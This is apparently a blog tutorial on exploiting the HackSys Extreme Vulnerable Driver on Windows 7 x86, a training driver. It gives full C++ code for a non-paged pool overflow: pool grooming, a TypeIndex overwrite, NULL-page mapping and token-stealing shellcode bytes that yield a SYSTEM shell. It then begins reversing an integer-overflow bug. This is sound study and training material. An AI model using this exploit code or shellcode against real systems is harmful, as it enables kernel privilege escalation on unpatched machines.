Take note that we’re storing the handles to each Event Object in a vector so that we can access those later.

Let’s spray our objects and then allocate our kernel buffer and see what the page that our kernel buffer ends up on looks like. We still have the same breakpoint from before, right after the memcpy operation. At this point the kernel buffer pointer is still in eax, don’t forget, so I just subtract 0x1000 from it (because that’s a small page size) and plug that right into the !pool command to get the whole page’s allocation information:

kd> !pool 8628b008-0x1000
Pool page 8628a008 region is Nonpaged pool
*8628a000 size:   40 previous size:    0  (Allocated) *Even (Protected)
		Pooltag Even : Event objects
 8628a040 size:   80 previous size:   40  (Free)       b.2.
 8628a0c0 size:   40 previous size:   80  (Allocated)  Even (Protected)
 8628a100 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a140 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a180 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a1c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a200 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a240 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a280 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a2c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a3c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a480 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a4c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a500 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a540 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a580 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a5c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a640 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a680 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a6c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a700 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a740 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a780 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a7c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a800 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a840 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a8c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a900 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a940 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a9c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aac0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628abc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628acc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628adc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aec0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628afc0 size:   40 previous size:   40  (Allocated)  Even (Protected)

That looks pretty nice. We get a nice contiguous block of Event Objects just as we expected (bit weird that there’s a 0x80 byte hole in there…).

The next thing we need to do is examine the constituent parts of these Event Objects to find our overwrite target. I like to take a look at the memory pane and then, following along with the cited blogposts, parse out the meaning of the byte values. Here is the memory view for one of the Event Object allocations:

8628afc0 08 00 08 04 45 76 65 ee 00 00 00 00 40 00 00 00  ....Eve.....@...
8628afd0 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00  ................
8628afe0 00 00 00 00 0c 00 08 00 40 f9 37 86 00 00 00 00  [email protected].....
8628aff0 01 00 04 34 00 00 00 00 f8 af 28 86 f8 af 28 86

We can start parsing this by taking a look at the pool header:

kd> dt nt!_POOL_HEADER 8628afc0 
   +0x000 PreviousSize     : 0y000001000 (0x8)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y000001000 (0x8)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4080008
   +0x004 PoolTag          : 0xee657645
   +0x004 AllocatorBackTraceIndex : 0x7645
   +0x006 PoolTagHash      : 0xee65

This looks pretty similar to what we’ve already seen; obviously the PoolTag is different, but so is the Ulong1 value, and you can examine the binary constituent parts that lead to its formulation. Next we’ll look at the OBJECT_HEADER_QUOTA_INFO, which starts at offset 0x8 from the beginning of our allocation, and you can match it up with the bytes in the memory view:

kd> dt nt!_OBJECT_HEADER_QUOTA_INFO 8628afc0+0x8
   +0x000 PagedPoolCharge  : 0
   +0x004 NonPagedPoolCharge : 0x40
   +0x008 SecurityDescriptorCharge : 0
   +0x00c SecurityDescriptorQuotaBlock : (null) 

So far, none of these things can be changed by our overwrite. Our overwrite has to keep all of this data intact so we’ll have to write these values into our input buffer. Next, we’ll finally start to approach our overwrite target when we parse out the OBJECT_HEADER:

kd> dt nt!_OBJECT_HEADER 8628afc0 + 8 + 10
   +0x000 PointerCount     : 0n1
   +0x004 HandleCount      : 0n1
   +0x004 NextToFree       : 0x00000001 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0xc ''
   +0x00d TraceFlags       : 0 ''
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0 ''
   +0x010 ObjectCreateInfo : 0x8637f940 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x8637f940 Void
   +0x014 SecurityDescriptor : (null) 
   +0x018 Body             : _QUAD

This is where things start to get interesting, as the TypeIndex value right now is set to 0xc. 0xc is actually an array index, like array[0xc]. This array is called the ObTypeIndexTable and it is filled with pointers which define OBJECT_TYPEs. This is actually really cool in my opinion because we can test this out. Let’s first dump all the pointers stored in the ObTypeIndexTable.

kd> dd nt!ObTypeIndexTable
82997760  00000000 bad0b0b0 84f46728 84f46660
82997770  84f46598 84fedf48 84fede08 84fedd40
82997780  84fedc78 84fedbb0 84fedae8 84fed410
82997790  85053520 8504f9c8 8504f900 8504f838
829977a0  8503f9c8 8503f900 8503f838 84ffb9c8
829977b0  84ffb900 84ffb838 84fef780 84fef6b8
829977c0  84fef5f0 8503b838 8503b770 8503b6a8
829977d0  85057590 850573a0 84ff3ca0 84ff3bd8

If the first entry, at 82997760, is array index 0, then index 0xc is going to be the DWORD at 82997760 + (0xc * 4) = 82997790, which is 85053520. Let’s get WinDBG to spill the beans on this type and see if it’s indeed an Event Object.

kd> dt nt!_OBJECT_TYPE 85053520 -b
   +0x000 TypeList         : _LIST_ENTRY [ 0x85053520 - 0x85053520 ]
      +0x000 Flink            : 0x85053520 
      +0x004 Blink            : 0x85053520 
   +0x008 Name             : _UNICODE_STRING "Event"
      +0x000 Length           : 0xa
      +0x002 MaximumLength    : 0xc
      +0x004 Buffer           : 0x8ba06838  "Event"
   +0x010 DefaultObject    : (null) 
   +0x014 Index            : 0xc ''
   +0x018 TotalNumberOfObjects : 0x6bbf
   +0x01c TotalNumberOfHandles : 0x6c2b
   +0x020 HighWaterNumberOfObjects : 0x6bbf
   +0x024 HighWaterNumberOfHandles : 0x6c2b
   +0x028 TypeInfo         : _OBJECT_TYPE_INITIALIZER
      +0x000 Length           : 0x50
      +0x002 ObjectTypeFlags  : 0 ''
      +0x002 CaseInsensitive  : 0y0
      +0x002 UnnamedObjectsOnly : 0y0
      +0x002 UseDefaultObject : 0y0
      +0x002 SecurityRequired : 0y0
      +0x002 MaintainHandleCount : 0y0
      +0x002 MaintainTypeList : 0y0
      +0x002 SupportsObjectCallbacks : 0y0
      +0x002 CacheAligned     : 0y0
      +0x004 ObjectTypeCode   : 2
      +0x008 InvalidAttributes : 0x100
      +0x00c GenericMapping   : _GENERIC_MAPPING
         +0x000 GenericRead      : 0x20001
         +0x004 GenericWrite     : 0x20002
         +0x008 GenericExecute   : 0x120000
         +0x00c GenericAll       : 0x1f0003
      +0x01c ValidAccessMask  : 0x1f0003
      +0x020 RetainAccess     : 0
      +0x024 PoolType         : 0 ( NonPagedPool )
      +0x028 DefaultPagedPoolCharge : 0
      +0x02c DefaultNonPagedPoolCharge : 0x40
      +0x030 DumpProcedure    : (null) 
      +0x034 OpenProcedure    : (null) 
      +0x038 CloseProcedure   : (null) 
      +0x03c DeleteProcedure  : (null) 
      +0x040 ParseProcedure   : (null) 
      +0x044 SecurityProcedure : 0x82abad90 
      +0x048 QueryNameProcedure : (null) 
      +0x04c OkayToCloseProcedure : (null) 
   +0x078 TypeLock         : _EX_PUSH_LOCK
      +0x000 Locked           : 0y0
      +0x000 Waiting          : 0y0
      +0x000 Waking           : 0y0
      +0x000 MultipleShared   : 0y0
      +0x000 Shared           : 0y0000000000000000000000000000 (0)
      +0x000 Value            : 0
      +0x000 Ptr              : (null) 
   +0x07c Key              : 0x6e657645
   +0x080 CallbackList     : _LIST_ENTRY [ 0x850535a0 - 0x850535a0 ]
      +0x000 Flink            : 0x850535a0 
      +0x004 Blink            : 0x850535a0 

Using the -b option here really saves us because it displays all levels of sub-structures within their parent structures. So, we have absolutely honed in on the pointer to Event objects as evidenced by this:

+0x008 Name             : _UNICODE_STRING "Event"

What gets cool here is that at offset 0x28 we see the TypeInfo structure. One of its members, the CloseProcedure, is 0x38 deep into that TypeInfo structure. So starting from offset 0x0 of the OBJECT_TYPE pointer we found in the table, the CloseProcedure is located at offset 0x28 + 0x38, or 0x60. THIS is the function pointer that is called when we use the CloseHandle API to free these Event Objects from the non-paged pool. So this is our target.
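Summarizing the chain of offsets (my own notes pieced together from the dumps above):

ObTypeIndexTable[0xc]  ->  _OBJECT_TYPE "Event"
                             +0x28  TypeInfo (_OBJECT_TYPE_INITIALIZER)
                                      +0x38  CloseProcedure
                             => CloseProcedure lives at _OBJECT_TYPE + 0x60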

If that is complicated I’ve tried to create a helpful diagram:

So what happens when we free the chunk with CloseHandle is that the kernel goes to the address referenced by array index 0xc, looks at offset 0x60 from there for a function pointer, and calls that function. Looking back at that table:

kd> dd nt!ObTypeIndexTable
82997760  00000000 bad0b0b0 84f46728 84f46660
----SNIP----

The first entry in the table is 0x00000000, and we already know from our NULL pointer dereference exploit that we can map the NULL page on Windows 7 x86. So thanks to the aforementioned bloggers, our path forward is clear. We’ll ONLY corrupt the value 0xc inside the OBJECT_HEADER so that it’s set to 0x0 instead; we’ll leave everything else the way it is with our overwrite. This way, when we free this chunk, the kernel will look at offset 0x60 from 0x00000000 for a function pointer. So we’ll just map the NULL page and place a pointer to our shellcode at offset 0x60.

Executing The Plan

Now that we know our plan of attack, we need to execute it.

The adjustment we need to make is to poke holes in this contiguous block so that when we get our buffer allocated the allocator slides it right between Event Objects. We know that it takes 8 Event Objects being freed to make a 0x200-sized hole, so following along with @FuzzySec, we’ll release 8 Event Object handles every 0x16 handles in our vector. Our code now looks like this:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F

vector<HANDLE> defragment_handles;
vector<HANDLE> sequential_handles;

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void spray_pool() {

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during defragmentation\n";
            exit(1);
        }

        defragment_handles.push_back(result);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during sequential.\n";
            exit(1);
        }

        sequential_handles.push_back(result);
    }
    
    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x200 byte-sized holes in our sequential allocation...\n";
    for (int i = 0; i < sequential_handles.size(); i = i + 0x16) {
        for (int x = 0; x < 8; x++) {
            BOOL freed = CloseHandle(sequential_handles[i + x]);
            if (freed == false) {
                cout << "[!] Unable to free sequential allocation!\n";
                cout << "[!] Last error: " << GetLastError() << "\n";
            }
        }
    }
    cout << "[>] Holes poked lol.\n";
}

void send_payload(HANDLE hFile) {
    
    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    spray_pool();

    send_payload(hFile);

    return 0;
}

After running it and looking up our post memcpy kernel buffer with the !pool command, we see that our 0x200 byte object was allocated precisely between two Event Objects! Everything is working as planned!

kd> !pool 862740c8
Pool page 862740c8 region is Nonpaged pool
 86274000 size:   40 previous size:    0  (Allocated)  Even (Protected)
 86274040 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274080 size:   40 previous size:   40  (Allocated)  Even (Protected)
*862740c0 size:  200 previous size:   40  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 862742c0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862743c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274480 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862744c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274500 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274540 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274580 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862745c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274640 size:  200 previous size:   40  (Free)       Even
 86274840 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862748c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274900 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274940 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862749c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274ac0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274bc0 size:  200 previous size:   40  (Free)       Even
 86274dc0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274e00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274e40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274e80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274ec0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274fc0 size:   40 previous size:   40  (Allocated)  Even (Protected)

Memory Corruption Engaged

Now that we can control the pool to a predictable degree, it’s time to overwrite that type index and change it from 0xc to 0x0. Everything else between our 0x200 allocation and this byte needs to remain the same or we’ll get a BSOD.

Let’s just use the dd command to dump 32 DWORD values from the beginning of the Event Object right after our kernel buffer real quick. Comparing it against the memory pane view of an Event Object from earlier, you can see how I formulate the input buffer in the exploit code.

kd> dd 8627e780 
8627e780  04080040 ee657645 00000000 00000040
8627e790  00000000 00000000 00000001 00000001
8627e7a0  00000000 0008000c 8637f940 00000000
----SNIP----

Right. So we need to keep everything but that 0xc TypeIndex byte intact and overwrite that single byte with 0x0. Looks like we’re overwriting 40 bytes in total, or 0x28, which gives us an input buffer size of 0x220. We’ll make an overwrite_payload variable that is a byte buffer and we’ll copy it into the last 0x28 bytes of a 0x220 sized buffer, with our original \x42 values taking up the first 0x1F8 bytes as follows:

 ULONG payload_len = 0x220;

    BYTE* input_buff = (BYTE*)VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    BYTE overwrite_payload[] = (
        "\x40\x00\x08\x04"  // pool header
        "\x45\x76\x65\xee"  // pool tag
        "\x00\x00\x00\x00"  // obj header quota begin
        "\x40\x00\x00\x00"
        "\x00\x00\x00\x00"
        "\x00\x00\x00\x00"  // obj header quota end
        "\x01\x00\x00\x00"  // obj header begin
        "\x01\x00\x00\x00"
        "\x00\x00\x00\x00"
        "\x00\x00\x08\x00" // 0xc converted to 0x0
        );

    memset(input_buff, '\x42', 0x1F8);
    memcpy(input_buff + 0x1F8, overwrite_payload, 0x28);

We’ll also want to allocate the NULL page, which I pulled directly from tekwizz123.

void allocate_shellcode() {

    _NtAllocateVirtualMemory NtAllocateVirtualMemory = 
        (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtAllocateVirtualMemory");

    INT64 address = 0x1;
    int size = 0x100;

    HANDLE result = (HANDLE)NtAllocateVirtualMemory(
        GetCurrentProcess(),
        (PVOID*)&address,
        NULL,
        (PSIZE_T)&size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    if (result == INVALID_HANDLE_VALUE) {
        cout << "[!] Unable to allocate NULL page...wtf?\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] NULL page mapped.\n";
    cout << "[>] Putting 'AAAA' on NULL page...\n";

    memset((void*)0x0, '\x41', 0x100);

}

I’ll also fill the NULL page with pure \x41 values so that when we run this code, we should get an Access Violation exception with an eip value of 41414141.

Last but not least, we have to free our chunks so that the CloseProcedure is activated!

void free_chunks() {

    cout << "[>] Freeing defragmentation allocations...\n";
    for (int i = 0; i < defragment_handles.size(); i++) {

        BOOL freed = CloseHandle(defragment_handles[i]);
        if (freed == false) {
            cout << "[!] Unable to free defragment allocation!\n";
            cout << "[!] Last error: " << GetLastError() << "\n";
            exit(1);
        }
    }
    cout << "[>] Defragmentation allocations freed.\n";
    cout << "[>] Freeing sequential allocations...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {

        BOOL freed = CloseHandle(sequential_handles[i]);
        if (freed == false) {
            cout << "[!] Unable to free sequential allocation!\n";
            cout << "[!] Last error: " << GetLastError() << "\n";
            exit(1);
        }
    }
    cout << "[>] Sequential allocations freed.\n";
}

We run this code and what happens??

Access violation - code c0000005 (!!! second chance !!!)
41414141 ??              ???

We did it!!

You can examine the pool allocations too. Look at the pool allocation right after our kernel buffer. We’ve replaced 0xc with 0x0, and you can see how it differs from the next Event Object; I’ve marked both bytes with asterisks.

855b8af8 42 42 42 42 42 42 42 42 40 00 08 04 45 76 65 ee  BBBBBBBB@...Eve.
855b8b08 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00  ....@...........
855b8b18 01 00 00 00 01 00 00 00 00 00 00 00 *00* 00 08 00  ................
855b8b28 80 82 14 85 00 00 00 00 01 00 04 00 00 00 00 00  ................
855b8b38 38 8b 5b 85 38 8b 5b 85 08 00 08 04 45 76 65 ee  8.[.8.[.....Eve.
855b8b48 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00  ....@...........
855b8b58 01 00 00 00 01 00 00 00 00 00 00 00 *0c* 00 08 00  ................

Now let’s just allocate some shellcode there…

Shellcode Implementation

We’re going to first use our shellcode from our Uninit Stack Variable exploit and see how far that gets us:

char Shellcode[] = (
		"\x60"
		"\x64\xA1\x24\x01\x00\x00"
		"\x8B\x40\x50"
		"\x89\xC1"
		"\x8B\x98\xF8\x00\x00\x00"
		"\xBA\x04\x00\x00\x00"
		"\x8B\x80\xB8\x00\x00\x00"
		"\x2D\xB8\x00\x00\x00"
		"\x39\x90\xB4\x00\x00\x00"
		"\x75\xED"
		"\x8B\x90\xF8\x00\x00\x00"
		"\x89\x91\xF8\x00\x00\x00"
		"\x61"
		"\xC3"
		);

These are my breakpoints right now:

kd> bp !HEVD+4D64
kd> ba r1 0x60
kd> bl
 0 e 8c295d64     0001 (0001) HEVD!TriggerNonPagedPoolOverflow+0xe6
 1 e 00000060 r 1 0001 (0001) 

Here is the disassembly pane after we hit our access breakpoint a few times (remember that that address will be accessed multiple times during our exploit). You can see we’re calling a function located at edi + 0x60 when edi is set to 0. So, this is our shellcode we’re about to run:

Here is the call stack:

We can see in the memory pane that we’re pushing 4 DWORDs onto the stack setting up our call to dword ptr [esp+0x60] which we would need to clean up in our subroutine (shellcode). So our shellcode will end with a ret 0x10 instruction to compensate.
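
To make that concrete, here is roughly where this leads. This is a sketch of my own, not the verbatim final exploit code: we allocate a RWX buffer for the shellcode, plant a 4 byte pointer to it at offset 0x60 of the NULL page we already mapped (the offset our TypeIndex-0 object gets called through, per the disassembly), and swap the shellcode’s trailing \xC3 for \xC2\x10\x00 (ret 0x10) to clean up those 4 DWORDs.

// sketch only: assumes the NULL page has already been mapped by allocate_shellcode()
LPVOID shellcode_addr = VirtualAlloc(NULL,
    sizeof(Shellcode),
    MEM_RESERVE | MEM_COMMIT,
    PAGE_EXECUTE_READWRITE);

// copy the token-stealing stub into the RWX buffer
memcpy(shellcode_addr, Shellcode, sizeof(Shellcode));

// plant the 4 byte pointer at NULL page offset 0x60 so the bogus
// object type's procedure call lands on our shellcode
memcpy((void*)0x60, &shellcode_addr, 0x4);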

Getting an nt authority/system shell:

Full exploit code: here

Conclusion

That was a really fun one. Thanks again to the aforementioned authors and exploit writers. Even though this exploit vector involved some relatively old techniques, it was still fun for me and I learned a lot just about memory management in general and got some more experience in WinDBG. Until next time!

HEVD Exploits – Windows 7 x86 Integer Overflow

By: h0mbre
20 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

Thanks to @tekwizz123, I used his method of setting up the exploit buffer for the most part as the Windows macros I was using weren’t working (obviously user error.)

Integer Overflow

This was a really interesting bug to me. Generically, the bug is when you have some arithmetic in your code that allows for unintended behavior. The bug in question here involved incrementing a DWORD value that was set to 0xFFFFFFFF, which overflows the integer size and wraps the value back around to 0x00000000. If you add 0x4 to 0xFFFFFFFF, you get 0x100000003. However, this value no longer fits in 32 bits (8 hex digits), so we lose the leading 1 and we’re back down to 0x00000003. Here is a small demo program:

#include <iostream>
#include <Windows.h>

int main() {

	DWORD var1 = 0xFFFFFFFF;
	DWORD var2 = var1 + 0x4;

	std::cout << ">> Variable One is: " << std::hex << var1 << "\n";
	std::cout << ">> Variable Two is: " << std::hex << var2 << "\n";
}

Here is the output:

>> Variable One is: ffffffff
>> Variable Two is: 3

I actually learned about this concept from Gynvael Coldwind’s stream on fuzzing. I also found the bug in my own code for an exploit on a real vulnerability I will hopefully be doing a write-up for soon (when the CVE gets published.) Now that we know how the bug occurs, let’s go find the bug in the driver in IDA and figure out how we can take advantage.

Reversing the Function

With the benefit of the comments I made in IDA, we can kind of see how this works. I’ve annotated where everything is after stepping through in WinDBG.

The first thing we notice here is that ebx gets loaded with the length of our input buffer in DeviceIoControl when we do this operation here: mov ebx, [ebp+Size]. This is kind of obvious, but I hadn’t really given it much thought before. We allocate an input buffer in our code, usually it’s a character or byte array, and then we usually satisfy the DWORD nInBufferSize parameter by doing something like sizeof(input_buffer) or sizeof(input_buffer) - 1 because we actually want it to be accurate. Later, we might actually lie a little bit here.

Now that ebx is the length of our input buffer, we see that it gets +4 added to it and is then loaded into eax. If we had an input buffer of 0x7FC, adding 0x4 to it would make it 0x800. A really important thing to note here is that we’ve essentially created a new length variable in eax and kept our old one in ebx intact. In this case, eax would be 0x800 and ebx would still hold 0x7FC.

Next, eax is compared to esi, which we can see holds 0x800. If eax is equal to or more than 0x800, we take the red path down to the Invalid UserBuffer Size debug message. We don’t want that. We need to satisfy this jbe condition.

If we satisfy the jbe condition, we branch down to loc_149A5. We put our buffer length from ebx into eax and then we effectively divide it by 4 since we do a bit shift right of 2. We compare this quotient to edi, which was zeroed out previously and has remained unchanged until now. If the counter in edi is the same or more than the length/4 quotient, we move to loc_149F1 where we will end up exiting the function soon after. Right now, since our length/4 is more than edi, we’ll jump to mov eax, [ebp+8].

This series of operations is actually the interesting part. eax is given a pointer to our input buffer and we compare the value there with 0BAD0B0B0. If they are the same value, we move towards exiting the function. So, so far we have identified two conditions where we’ll exit the function: if edi is ever equal to or more than the length of our input buffer divided by 4 OR if the 4 byte value located at [ebp+8] is equal to 0BAD0B0B0.

Let’s move on to the final puzzle piece. mov [ebp+edi*4+KernelBuffer], eax is kind of convoluted looking, but what it’s doing is placing the 4 byte value in eax into the kernel buffer at index edi * 0x4. Right now edi is 0, so it’s placing the 4 byte value right at the beginning of the kernel buffer. After this, the dword ptr value at ebp+8 is incremented by 0x4. This is interesting because we already know that ebp+0x8 holds the pointer to our input buffer. So now that we’ve placed the first four bytes from our input buffer into the kernel buffer, we move on to the next 4 bytes. We also see that edi is incremented, and now we understand what is taking place.

As long as:

  1. the length of our buffer + 4 is < 0x800,
  2. the Counter variable (edi) is < the length of our buffer divided by 4,
  3. and the 4 byte value in eax is not 0BAD0B0B0,

we will copy 4 bytes of our input buffer into the kernel buffer and then move onto the next 4 bytes in the input buffer to test criteria 2 and 3 again.
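
To put the reversing together, here is a pseudocode sketch of the loop. This is my reconstruction from the disassembly, not HEVD’s actual source, and the names are made up:

// my reconstruction of the copy loop -- UserBuffer and Size come straight
// from our DeviceIoControl call; names are invented for illustration
void TriggerVulnerability(ULONG* UserBuffer, ULONG Size)
{
    ULONG KernelBuffer[0x200] = { 0 };      // the 0x800 byte kernel buffer

    if (Size + 4 < 0x800)                   // the length check on size + 4
    {
        for (ULONG Counter = 0; Counter < Size / 4; Counter++)
        {
            // stop copying if we hit the terminator value
            if (UserBuffer[Counter] == 0xBAD0B0B0)
                break;

            // 4 byte copy with no bounds check on KernelBuffer
            KernelBuffer[Counter] = UserBuffer[Counter];
        }
    }
}

Notice that Size is read once from our DeviceIoControl call and reused both in the Size + 4 check and in the Size / 4 loop bound, which is exactly what we’re about to take advantage of.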

